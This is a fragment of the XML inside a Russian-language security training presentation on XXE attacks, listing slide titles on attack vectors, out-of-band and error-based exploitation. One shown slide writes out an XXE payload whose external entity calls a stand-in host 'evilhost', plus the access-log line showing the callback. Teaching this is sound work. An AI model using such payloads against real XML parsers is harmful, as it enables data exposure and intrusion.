          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>% z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SYSTEM "http://evilhost/check" &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>%z; ]&gt;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&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SYSTEM "http://evilhost/check" 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&lt;z/&gt;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cat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/logs/access.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>192.168.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>- - [22/Aug/2016:13:29:24 +0300] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>“GET /check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTTP/1.1" 405 569 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"-"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99918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6442</TotalTime>
  <Words>1113</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Произвольный</PresentationFormat>
  <Paragraphs>209</Paragraphs>
  <Slides>30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Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Основы практической безопасности Атака XXE</vt:lpstr>
      <vt:lpstr>XML</vt:lpstr>
      <vt:lpstr>Well-formed</vt:lpstr>
      <vt:lpstr>Valid</vt:lpstr>
      <vt:lpstr>Valid</vt:lpstr>
      <vt:lpstr>Valid</vt:lpstr>
      <vt:lpstr>PROFIT?!</vt:lpstr>
      <vt:lpstr>Как проверить?</vt:lpstr>
      <vt:lpstr>А еще?</vt:lpstr>
      <vt:lpstr>А еще?</vt:lpstr>
      <vt:lpstr>Векторы атаки</vt:lpstr>
      <vt:lpstr>Локальные ресурсы</vt:lpstr>
      <vt:lpstr>Порты</vt:lpstr>
      <vt:lpstr>Wrappers</vt:lpstr>
      <vt:lpstr>DOS (unix)</vt:lpstr>
      <vt:lpstr>DOS (billion laughs attack)</vt:lpstr>
      <vt:lpstr>Векторы эксплуатации</vt:lpstr>
      <vt:lpstr>Out-of-band</vt:lpstr>
      <vt:lpstr>Out-of-band</vt:lpstr>
      <vt:lpstr>Out-of-band</vt:lpstr>
      <vt:lpstr>Error-based</vt:lpstr>
      <vt:lpstr>Не только SYSTEM</vt:lpstr>
      <vt:lpstr>Standalone </vt:lpstr>
      <vt:lpstr>PostgreSQL</vt:lpstr>
      <vt:lpstr>Oracle</vt:lpstr>
      <vt:lpstr>Java +1.7 exp trick</vt:lpstr>
      <vt:lpstr>Парсеры</vt:lpstr>
      <vt:lpstr>Нужно больше презентаций</vt:lpstr>
      <vt:lpstr>Домашка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Yaroslav Babin</dc:creator>
  <cp:lastModifiedBy>Грибанов Антон Алексеевич</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-08-17T15:23:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-23T14:46:15Z</dcterms:modified>
</cp:coreProperties>
</file>